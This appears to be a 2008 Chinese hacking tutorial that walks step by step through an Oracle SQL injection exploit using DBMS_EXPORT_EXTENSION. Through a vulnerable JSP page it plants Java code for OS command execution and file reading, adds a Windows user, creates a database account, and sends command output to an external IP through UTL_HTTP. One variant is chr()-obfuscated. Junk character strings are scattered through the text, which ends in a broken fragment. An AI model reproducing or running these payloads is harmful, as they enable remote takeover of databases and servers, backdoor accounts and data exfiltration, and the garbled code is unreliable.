以下的演示都是在web上的sql plus中执行的;在web注入时,把 select SYS.DBMS_EXPORT_EXTENSION..... 改成
7 s" d4 g) z( f2 u. O; W /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
的形式即可。(用 " 'a'|| " 是为了让该条件语句返回true值)
语句有点长,可能需要用post方式提交。
以下是各个步骤:
1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面有两个函数:runCMD用于执行系统命令,readFile用于读取文件:
2 a% V- g% x4 d9 s' q/xxx.jsp?id=1 and '1'<>'a'||(
) C2 E. d3 A: }select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''( G- e- h9 N* n& l4 L- u) E, \
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
7 x% [2 I0 n I) @ `2 H- hnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
9 ?6 e( n( d) Y1 A1 C; f' o; c}'''';END;'';END;--','SYS',0,'1',0) from dual
8 a& W. ]8 V2 V. K)
------------------------
如果url有长度限制,可以把readFile()函数块去掉,即:
7 a2 ~1 u& u- u/xxx.jsp?id=1 and '1'<>'a'||(
# p9 B0 X% K6 } W( Xselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''9 N- b" {3 j f, d* d& l' C
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
/ D/ k* Z8 }4 Fnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
& \3 N) r- |* v6 T8 l4 q+ L}'''';END;'';END;--','SYS',0,'1',0) from dual
/ ~$ w! V' x' x& a9 o0 Z) & ?. A7 K* y# v1 A: @+ \/ M
同时把后面步骤中提到的对readFile()的处理语句也去掉。
------------------------------
2.赋Java权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual/ G0 E7 n/ A y5 U
3.创建函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
& N% j- |6 V. k* ^create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual7 J; K) V; | J
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
T# E% E+ U5 Y3 Jcreate or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
4.赋予public执行函数的权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
" o3 ^9 |! n- ^0 m( ]select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual* ]2 t# O$ Q8 E# U; n
5.测试上面的几步是否成功
and '1'<>'11'||(
+ E' ^) ^3 z" J. M+ U d( ?select OBJECT_ID from all_objects where object_name ='LINXRUNCMD'
! \, u+ T' T4 a)
3 U4 N) T7 h" Y) A ^' ?and '1'<>(
( R) F8 u4 J3 aselect OBJECT_ID from all_objects where object_name ='LINXREADFILE' - O3 U" ~' s4 S2 i7 w2 l" ~ |
) 6 B; }& s/ r, I6 {
6.执行命令:
/xxx.jsp?id=1 and '1'<>( # G/ J7 D- c3 G j
select sys.LinxRunCMD('cmd /c net user linx /add') from dual " {! q: j$ ?" L; O! R7 e
) D+ D3 J1 v2 L6 [6 F8 e5 F
)
8 o( D( P- @% z1 ?& m/xxx.jsp?id=1 and '1'<>(
) z' c2 f/ a$ [( {( Rselect sys.LinxReadFile('c:/boot.ini') from dual
, Y: L7 S, P+ C& y" t) a( s
' T1 p3 y0 r/ X% b: K8 F- b)# u0 Z8 Y5 B2 o, ^4 n
注意sys.LinxReadFile()返回的是varchar类型,不能用 "and 1<>" 代替 "and '1'<>"。
如果要查看运行结果,可以用 union :
- T4 V$ R9 z o4 @9 U/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual
或者用UTL_HTTP.request():
/xxx.jsp?id=1 and '1'<>( 5 |/ h( @$ i0 g) ~1 D
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
6 |7 D+ g$ _# Y. p5 a* F$ h) ; ?' q4 a e; ~5 w3 F/ w, x5 g F
/xxx.jsp?id=1 and '1'<>(
, J8 }6 N& d; K& P* nSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual1 \ X$ b: o) n; t2 P4 Z
)
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符替换掉,否则无法提交http request。用utl_encode.base64_encode编码也可以。
--------------------
6.内部变化
通过以下命令可以查看all_objects表的改变:
. l* ^9 e4 ~$ ~& Qselect * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'
7.删除我们创建的函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
) e A. ]% U( e' ~* Vdrop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual
====================================================
全文结束。谨以此文赠与我的朋友。
a, w, G1 @) A3 u X- |9 u! L4 Mlinx 8 ]# ?( G/ E( o7 K2 O
124829445 $ R+ J! N- [+ c
2008.1.12
" Y9 J# r9 {' ]1 c6 Q: A! olinyujian@bjfu.edu.cn
======================================================================
测试漏洞的另一方法:
创建oracle帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
) f# T+ b0 C3 w$ fCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
即:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
& x, q+ @+ t2 m7 J1 _) `% @chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
确定漏洞存在:
1<>( 3 W/ w0 _6 ]6 A: D3 I5 Q9 z
select user_id from all_users where username='LINXSQL'
9 s# g( u/ m# Y, U$ F)
给linxsql连接权限:
7 ?: o! E4 U( c/ ~4 Vselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
6 u9 }4 u+ m( DGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
删除帐号:
2 p- ~% Y& [7 O9 u1 H+ rselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
* W9 [# p! K( T4 `drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1";但它的权限是继承自调用者的,可能仅仅是public权限,作用似乎不大,真要用的话可以考虑 grant dba to 当前的User:
1.jsp?id=1 and '1'<>(
, l' V( M' T9 s$ ~' A3 Dselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
& x% F1 y: J L2 ^& V. @% o* ^, Hcreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual
. i+ B" e3 d/ }/ D$ ~. `) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE" K4 s: ` M6 G' D
)
! U' h/ H* b$ `: ?. g, c# [; `! l
% Z6 k: [6 U$ U6 M# y! P
* ?( c/ R/ o; F6 P1 m4 |
% }8 u2 ^& |! J+ Q& t A |